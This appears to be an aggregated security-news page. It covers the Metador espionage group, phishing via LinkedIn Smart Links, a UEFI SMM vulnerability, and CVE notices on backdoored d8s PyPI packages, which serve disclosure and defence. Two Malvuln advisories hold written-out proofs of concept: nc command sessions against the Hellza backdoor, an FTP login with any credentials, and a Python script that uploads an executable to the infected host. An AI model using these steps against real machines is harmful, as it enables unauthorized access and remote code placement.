Researchers from SentinelLabs laid out what they know about the attackers and implored the researcher community for help in learning more about the shadowy group.

LABSCON – Scottsdale, Ariz. – A new threat actor that has infected a telecommunications company in the Middle East and multiple Internet service providers and universities in the Middle East and Africa is responsible for two "extremely complex" malware platforms — but a lot about the group that remains shrouded in mystery, according to new research revealed here today.

Researchers from SentintelLabs, who shared their findings at the first-ever LabsCon security conference, named the group Metador, based on the phrase "I am meta" that appears in the malicious code and the fact that the server messages are typically in Spanish. The group is believed to have been active since December 2020, but it has successfully flown under the radar over the past few years. Juan Andrés Guerrero-Saade, senior director of SentinelLabs, said the team shared information about Metador with researchers at other security firms and government partners, but no one knew anything about the group.

Guerrero-Saade and SentinelLabs researchers Amitai Ben Shushan Ehrlich and Aleksandar Milenkoski published a blog post and technical details about the two malware platforms, metaMain and Mafalda, in hopes of finding more victims who have been infected. "We knew where they were, not where they are now," Guerrero-Saade said.

MetaMain is a backdoor that can log mouse and keyboard activity, grab screenshots, and exfiltrate data and files. It can also be used to install Mafalda, a highly modular framework that provides attackers with the ability to collect system and network information and other additional capabilities. Both metaMain and Mafalda operate entirely in memory and do not install themselves on the system’s hard drive.

**Political Comic**

The malware’s name is believed to have been inspired by Mafalda, a popular Spanish-language cartoon from Argentina that regularly comments on political topics.

Metador set up unique IP addresses for each victim, ensuring that even if one command and control is uncovered, the rest of the infrastructure remains operational. This also makes it extremely difficult to find other victims. It's often the case that when researchers uncover attack infrastructure, they find information belonging to multiple victims — which helps map out the extent of the group's activities. Because Metador keeps its target campaigns separated, researchers have only a limited view into Metador's operations and what kind of victims the group is targeting.

What the group doesn't seem to mind, however, is mixing with other attack groups. The Middle Eastern telecommunications company that was one of Metador's victims was already compromised by at least 10 other nation-state attack groups, the researchers found. Many of the other groups appeared to be affiliated with China and Iran.

Multiple threat groups targeting the same system is sometimes referred to as a "magnet of threats," as they attract and host the various groups and malware platforms simultaneously. Many nation-state actors take the time to remove traces of infection by other groups, even going as far as patching the flaws the other groups used, before carrying out their own attack activities. The fact that Metador infected malware on a system already compromised (repeatedly) by other groups suggests that the group doesn't care about what the other groups would do, the SentinelLabs researchers said.

It's possible the telecommunications company was such as high-value target that the group was willing to take the risk of detection since the presence of multiple groups on the same system increases the likelihood that the victim will notice something wrong.

**Shark Attack**

While the group appears to be extremely well-resourced — as evidenced by the technical complexity of the malware, the group's advanced operational security to evade detection, and the fact that it is under active development — Guerrero-Saade warned that it wasn't enough to determine that there was nation-state involvement. It is possible that Metador may be the product of a contractor working on behalf of a nation-state, as there are signs the group was highly professional, Geurrero-Saade said. And the members may have prior experience carrying out these kinds of attacks at this level, he noted.

"We consider the discovery of Metador akin to a shark fin breaching the surface of the water," the researchers wrote, noting that they have no idea what is happening underneath. "It's a cause for foreboding that substantiates the need for the security industry to proactively engineer towards detecting the true upper crust of threat actors that currently traverse networks with impunity."

Researchers Uncover Mysterious 'Metador' Cyber-Espionage Group

The tactic is just one in a constantly expanding bag of tricks that attackers are using to get users to click on links and open malicious documents.

A malicious campaign targeting Internet users in Slovakia is serving up another reminder of how phishing operators frequently leverage legitimate services and brands to evade security controls.

In this instance, the threat actors are taking advantage of a LinkedIn Premium feature called Smart Links to direct users to a phishing page for harvesting credit card information. The link is embedded in an email purportedly from the Slovakian Postal Service and is a legitimate LinkedIn URL, so secure email gateways (SEGs) and other filters are often unlikely to block it.

"In the case that Cofense found, attackers used a trusted domain like LinkedIn to get past secure email gateways," says Monnia Deng, director of product marketing at Bolster. "That legitimate link from LinkedIn then redirected the user to a phishing site, where they went to great lengths to make it seem legitimate, such as adding a fake SMS text message authentication."

The email also asks the recipient to pay a believably small amount of money for a package that is apparently pending shipment to them. Users tricked into clicking on the link arrive at a page designed to appear like one the postal service uses to collect online payments. But instead of merely paying for the supposed package shipment, users end up giving away their entire payment card details to the phishing operators as well.

**Not the First Tine Smart Links Feature Has Been Abused**

The campaign is not the first time that threat actors have abused LinkedIn's Smart Links feature — or Slinks, as some call it — in a phishing operation. But it marks one of the rare instances where emails containing doctored LinkedIn Slinks have ended up in user inboxes, says Brad Haas, senior intelligence analyst at Cofense. The phishing protection services vendor is currently tracking the ongoing Slovakian campaign and this week issued a report on its analysis of the threat so far.

LinkedIn's Smart Links is a marketing feature that lets users who are subscribed to its Premium service direct others to content the sender want them to see. The feature allows users to use a single LinkedIn URL to point users to multiple marketing collateral — such as documents, Excel files, PDFs, images, and webpages. Recipients receive a LinkedIn link that, when clicked, redirects them to the content behind it. LinkedIn Slinks allows users to get relatively detailed information on who might viewed the content, how they might have interacted with it, and other details.

It also gives attackers a convenient — and very credible — way to redirect users to malicious sites. 

"It's relatively easy to create Smart Links," Haas says. "The main barrier to entry is that it requires a Premium LinkedIn account," he notes." A threat actor would need to purchase the service or gain access to a legitimate user's account. But besides that, it's relatively easy for threat actors to use these links to send users to malicious sites, he says. "We have seen other phishing threat actors abuse LinkedIn Smart Links, but as of today, it's uncommon to see it reaching inboxes."

**Leveraging Legitimate Services**

The growing use by attackers of legitimate software-as-a-service and cloud offerings such LinkedIn, Google Cloud, AWS, and numerous others to host malicious content or to direct users to it, is one reason why phishing remains one of the primary initial access vectors.

Just last week, Uber experienced a catastrophic breach of its internal systems after an attacker social engineered an employee's credentials and used them to access the company's VPN. In that instance, the attacker — who Uber identified as belonging to the Lapsus$ threat group — tricked the user into accepting a multifactor authentication (MFA) request by pretending to be from the company's IT department.

It's significant that attackers are leveraging social media platforms as a proxy for their fake phishing websites. Also troubling is the fact that phishing campaigns have evolved significantly to not only be more creative but also more accessible to people who can’t write code, Deng adds.

"Phishing occurs anywhere you can send or receive a link," adds Patrick Harr, CEO at SlashNext. Hackers are wisely using techniques that avoid the most protected channels, like corporate email. Instead, they are opting to use social media apps and personal emails as a backdoor into the enterprise. "Phishing scams continue to be a serious problem for organizations, and they are moving to SMS, collaboration tools, and social," Harr says. He notes that SlashNext has seen an increase in requests for SMS and messaging protection as compromises involving text messaging becomes a bigger problem.

Threat Actor Abuses LinkedIn's Smart Links Feature to Harvest Credit Cards

An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). This issue affects: Module name: OverClockSmiHandler SHA256: a204699576e1a48ce915d9d9423380c8e4c197003baf9d17e6504f0265f3039c Module GUID: 4698C2BD-A903-410E-AD1F-5EEF3A1AE422

CVE-2022-40261

Backdoor.Win32.Hellza.120 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Hellza.120Vulnerability: Unauthorized Remote Command ExecutionDescription: The malware listens on TCP ports 12122, 21.  Third-party adversarys who can reach infected systems can issue commands made available by the backdoor.Family: HellzaType: PE32MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21Vuln ID: MVID-2022-0641Dropped files: msdllsrv.exeDisclosure: 09/19/2022 Exploit/PoC:C:\>nc64.exe x.x.x.x 12122xrR_Server version:1.20 Beta R1.1F (starts FTP if not running in case where the server was restarted)L (logger)L15_ *0.00 KB*D (drives)D 1C:\2D:\E (run file)Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Hellza.120 MVID-2022-0641 Remote Command Execution

Backdoor.Win32.Hellza.120 malware suffers from an authentication bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Hellza.120Vulnerability: Authentication BypassDescription: The malware listens on TCP ports 12122, 21.  Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.Family: HellzaType: PE32MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21Vuln ID: MVID-2022-0642Dropped files: msdllsrv.exeDisclosure: 09/19/2022 Exploit/PoC:C:\>nc64.exe 192.168.18.125 21220 HellzAddiction FTP server.USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,219,186).CDUP \250 CWD command successful. "C:/" is current directory.STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=56250DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Hellza.120 MVID-2022-0642 Authentication Bypass

The d8s-ip-addresses for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0

We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-hypothesis package. Attackers can upload democritus-hypothesis packages containing arbitrary malicious code. For the safety of this project, the democritus-hypothesis package has been uploaded by us.

The democritus-hypothesis package can be successfully installed using pip install d8s-ip-addresses==0.1.0

Suggestion: remove version 0.1.0 of this project in PyPI

CVE-2022-40810: code execution backdoor · Issue #13 · democritus-project/d8s-ip-addresses

The d8s-asns for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-networking package. The affected version is 0.1.0.

We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-networking package. Attackers can upload democritus-networking packages containing arbitrary malicious code. For the safety of this project, the democritus-networking package has been uploaded by us.

The democritus-networking package can be successfully installed using pip install d8s-asns==0.1.0

Suggestion: remove version 0.1.0 of this project in PyPI

CVE-2022-40426: code execution backdoor · Issue #8 · democritus-project/d8s-asns

The d8s-strings for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0.

Democritus functions\[1\] for working with Python strings.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

Once imported, you can use any of the functions listed below.

*   def string\_chars\_at\_start(string: str, chars: Iterable) \-> Iterable\[str\]:
        """."""
    
*   def string\_chars\_at\_start\_len(string: str, chars: Iterable) \-> int:
        """."""
    
*   def a10n(string: str) \-> str:
        """."""
    
*   def string\_remove\_index(string: str, index: int) \-> str:
        """Remove the item from the string at the given index."""
    
*   def string\_replace\_index(string: str, index: int, replacement: str) \-> str:
        """Replace the character in the string at the given index with the replacement."""
    
*   def string\_remove\_before(string: str, stop\_string: str):
        """Remove everything from the start of the given string until the stop\_string."""
    
*   def string\_remove\_after(string: str, start\_string: str):
        """Remove everything after the start\_string to the end of the given string."""
    
*   def string\_is\_palindrome(string: str) \-> bool:
        """Return whether or not the given string is a palindrome."""
    
*   def string\_reverse(string: str) \-> str:
        """Reverse the given string."""
    
*   def indefinite\_article(word):
        """Return the word with the appropriate indefinite article."""
    
*   def is\_plural(possible\_plural: str) \-> bool:
        """Return whether or not the possible\_plural is plural."""
    
*   def pluralize(word: str) \-> str:
        """Make the word plural."""
    
*   def is\_singular(possible\_singular: str) \-> bool:
        """Return whether or not the possible\_singular is singular."""
    
*   def singularize(word: str) \-> str:
        """Make the word singular."""
    
*   def cardinalize(word: str, count: int) \-> str:
        """Return the appropriate form of the given word for the count."""
    
*   def ordinalize(number: int) \-> str:
        """Return the appropriate form for the ordinal form of the given number."""
    
*   def string\_forms(text):
        """Return multiple forms for the given text."""
    
*   def string\_left\_pad(string, length: int, \*, padding\_characters\=' '):
        """Pad the given string with the given padding\_characters such that the length of the resulting string is equal to the \`length\` argument. Adapted from the javascript code here: https://www.theregister.co.uk/2016/03/23/npm\_left\_pad\_chaos/."""
    
*   def string\_to\_bool(string: str) \-> bool:
        """."""
    
*   def text\_examples(n\=10):
        """Create n example texts."""
    
*   def string\_has\_multiple\_consecutive\_spaces(string):
        """Return True if the given string has multiple, consecutive spaces."""
    
*   def character\_examples(n\=10):
        """Create n example characters."""
    
*   def text\_abbreviate(text):
        """Abbreviate the given text."""
    
*   def text\_input\_is\_yes(message):
        """Get yes/no input from the user and return \`True\` if the input is yes and \`False\` if the input is no."""
    
*   def text\_input\_is\_no(message):
        """Get yes/no input from the user and return \`True\` if the input is no and \`False\` if the input is yes."""
    
*   def string\_is\_yes(string):
        """Check if a string is some form of \`y\` or \`yes\`."""
    
*   def string\_is\_no(string):
        """Check if a string is some form of \`n\` or \`no\`."""
    
*   def xor(message, key):
        """."""
    
*   def text\_join(join\_character, \*args):
        """Join all of the arguments around the given join\_character."""
    
*   def string\_insert(existing\_string, new\_string, index):
        """Insert the new\_string into the existing\_string at the given index."""
    
*   def base64\_encode(input\_string):
        """Base64 encode the string."""
    
*   def base64\_decode(input\_string):
        """Base64 decode the string."""
    
*   def string\_sequence\_matcher(string\_a, string\_b):
        """Create a difflib.SequenceMatcher for the given string."""
    
*   def strings\_diff(string\_a, string\_b):
        """Return the diff of the two strings."""
    
*   def string\_add\_to\_start\_of\_each\_line(string: str, string\_to\_add\_to\_each\_line: str):
        """Add the given string\_to\_add\_to\_each\_line to the beginning of each line in the string."""
    
*   def string\_get\_closes\_matches(word, possible\_matches, maximum\_matches\=3, cutoff\=0.6):
        """Return the words from the list of possible matches that are closest to the given word."""
    
*   def strings\_similarity(a: str, b: str):
        """Return the ratio of similarity between the two strings."""
    
*   def strings\_matching\_blocks(a: str, b: str):
        """Return the matching blocks in the given strings."""
    
*   def strings\_longest\_matching\_block(a: str, b: str):
        """Return the longest matching block in the string."""
    
*   def strings\_diff\_opcodes(a: str, b: str):
        """Return the opcodes representing the differences/similarities between two strings."""
    
*   def string\_common\_prefix(a: str, b: str) \-> str:
        """Returns the common prefix string from left to right between a and b."""
    
*   def string\_common\_suffix(a: str, b: str):
        """Returns the common suffix string from left to right between a and b."""
    
*   def characters(input\_string):
        """Return all of the characters in the given string."""
    
*   def hex\_to\_string(hex\_string):
        """Convert the given hex string to ascii."""
    
*   def string\_to\_hex(ascii\_string: str, seperator\='') \-> str:
        """Convert the given ascii string to hex."""
    
*   def character\_to\_unicode\_number(character):
        """Convert the given character to its Unicode number. This is the same as the \`ord\` function in python."""
    
*   def unicode\_number\_to\_character(unicode\_number):
        """Convert the given unicode\_number to it's unicode character form. This is the same as the \`chr\` function in python."""
    
*   def hamming\_distance(string\_1, string\_2, as\_percent\=False):
        """Return the number of positions at which corresponding symbols in string\_1 and string\_2 are different (this is known as the Hamming Distance). See https://en.wikipedia.org/wiki/Hamming\_distance."""
    
*   def from\_char\_code(integer\_list):
        """."""
    
*   def text\_ascii\_characters(text: str) \-> Tuple\[str\]:
        """."""
    
*   def text\_non\_ascii\_characters(text: str) \-> Tuple\[str\]:
        """."""
    
*   def letter\_as\_number(letter):
        """."""
    
*   def letter\_frequency(letter, text):
        """Find the frequency of the given letter in the given text."""
    
*   def string\_entropy(text, ignore\_case\=False):
        """Find the shannon entropy of the text. Inspired by the algorithm here https://web.archive.org/web/20160320142455/https://deadhacker.com/2007/05/13/finding-entropy-in-binary-files/. You can see more here: https://en.wikipedia.org/wiki/Entropy\_(information\_theory)"""
    
*   def substrings(iterable):
        """Find all substrings in the given string."""
    
*   def string\_remove\_non\_alphabetic\_characters(string: str):
        """."""
    
*   def string\_remove\_non\_numeric\_characters(string: str):
        """."""
    
*   def string\_remove\_non\_alpha\_numeric\_characters(string: str):
        """."""
    
*   def string\_remove(regex\_pattern, input\_string, \*\*kwargs):
        """Remove the regex\_pattern from the input\_string."""
    
*   def string\_remove\_unicode(string: str):
        """Remove all Unicode characters from the given string."""
    
*   def string\_remove\_numbers(input\_string: str, replacement: str \= ' '):
        """Remove all numbers from the input\_strings."""
    
*   def string\_remove\_from\_start(input\_string, string\_to\_remove):
        """Remove the string\_to\_remove from the start of the input\_string."""
    
*   def string\_remove\_from\_end(input\_string, string\_to\_remove):
        """Remove the string\_to\_remove from the end of the input\_string."""
    
*   def string\_as\_numbers(input\_string: str):
        """."""
    
*   def string\_in\_iterable\_fuzzy(input\_string, iterable):
        """Find if the given input\_string is in one of the strings in an iterable."""
    
*   def string\_find\_between(input\_string: str, start\_string: str, end\_string: str, \*args):
        """Find the string in the input\_string that is between the start\_string and the end\_string."""
    
*   def switch(a, b, text):
        """Switch a and b in the text."""
    
*   def string\_encode\_as\_bytes(input\_string, encoding\='utf-8', \*\*kwargs):
        """."""
    
*   def bytes\_decode\_as\_string(bytes\_text, encoding\='utf-8', \*\*kwargs):
        """."""
    
*   def string\_shorten(input\_string, length, suffix\='...'):
        """Shorten the given input\_string to the given length."""
    
*   def string\_split\_without\_empty(input\_string, split\_char):
        """Split a input\_string on split\_char and remove empty entries."""
    
*   def string\_has\_index(string: str, index: Union\[str, int\]) \-> bool:
        """."""
    
*   def string\_split\_on\_uppercase(input\_string: str, include\_uppercase\_characters\=False, split\_acronyms\=True):
        """Split the input\_string on uppercase characters. If split\_acronyms is False, the function will not split consecutive uppercase letters."""
    
*   def string\_split\_on\_lowercase(input\_string, include\_lowercase\_characters\=False):
        """Split the string on lowercase characters."""
    
*   def string\_split\_multiple(string, \*splitting\_characters):
        """Split a string up based on multiple splitting\_characters."""
    
*   def string\_reverse\_case(input\_string):
        """Make lowercase characters uppercased and visa-versa."""
    
*   def text\_vowels(text):
        """Return all of the vowels in the text."""
    
*   def text\_vowel\_count(text):
        """Count the number of vowels in the text."""
    
*   def text\_consonants(text):
        """Return all of the consonants in the text."""
    
*   def text\_consonant\_count(text):
        """Count the number of consonants in the text."""
    
*   def text\_input(message\='Enter/Paste your content.'):
        """."""
    
*   def text\_ensure\_starts\_with(text: str, prefix: str):
        """Make sure the given text starts with the given prefix."""
    
*   def text\_ensure\_ends\_with(text: str, suffix: str):
        """Make sure the given text ends with the given suffix."""
    
*   def titlecase(item):
        """."""
    
*   def uppercase(item):
        """."""
    
*   def uppercase\_first\_letter(text):
        """Make the first letter of the text uppercase."""
    
*   def lowercase\_first\_letter(text):
        """Make the first letter of the text lowercase."""
    
*   def crazycase(text):
        """Make the case of the characters in the given text pseudo-random"""
    
*   def kebab\_case(text):
        """Return the text with a "-" in place of every space."""
    
*   def snake\_case(text):
        """Return the text with a "\_" in place of every space."""
    
*   def camel\_case(text: str):
        """Return the text with no spaces and every word (except the first one) capitalized."""
    
*   def pascal\_case(text: str):
        """Return the text with no spaces and every word capitalized."""
    
*   def sentence\_case(text: str):
        """."""
    
*   def uppercase\_count(text):
        """Count the number of uppercase letters in the given text."""
    
*   def lowercase\_count(text):
        """Count the number of lowercase letters in the given text."""
    
*   def lowercase(item):
        """."""
    
*   def string\_rotate(text, rot\=13):
        """Return the text converted using a Caesar cipher (https://en.wikipedia.org/wiki/Caesar\_cipher) in which the text is rotated by the given amount (using the \`rot\` argument)."""
    
*   def text\_is\_english\_sentence(text: str) \-> bool:
        """Determine whether or not the sentence is likely English."""
    
*   def leet\_speak\_to\_text(leet\_speak\_text):
        """."""
    
*   def text\_to\_leet\_speak(text):
        """."""
    
*   def unicode\_to\_ascii(text: str):
        """Convert the text to ascii."""
    

👋  If you want to get involved in this project, we have some short, helpful guides below:

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

CVE-2022-40432: d8s-strings

The d8s-json for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.

We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using pip install d8s-json==0.1.0

Suggestion: remove version 0.1.0 of this project in PyPI

CVE-2022-38882: code execution backdoor · Issue #9 · democritus-project/d8s-json

The d8s-archives for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.

**Project description**

**Democritus Archives (a.k.a. d8s-archives)**

      

Democritus functions\[1\] for working with archives.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

**Installation**

    pip install d8s-archives
    

**Usage**

You import the library like:

from d8s\_archives import \*

Once imported, you can use any of the functions listed below.

**Functions**

*   def archive\_create(file\_path, output\_path, \*, archive\_name\=None):
        """Archive the given file."""
    
*   def archive\_read(file\_path, \*, archive\_name\=None, password\=None) \-> Iterable\[Tuple\[str, str\]\]:
        """Read file(s) from the archive. If archive\_name is given, read only that file; otherwise, read all files."""
    

**Development**

👋  If you want to get involved in this project, we have some short, helpful guides below:

*   contribute to this project 🥇
*   test it 🧪
*   lint it 🧹
*   explore it 🔭

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

**Credits**

This package was created with Cookiecutter and Floyd Hightower's Python project template.

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

Tag

#backdoor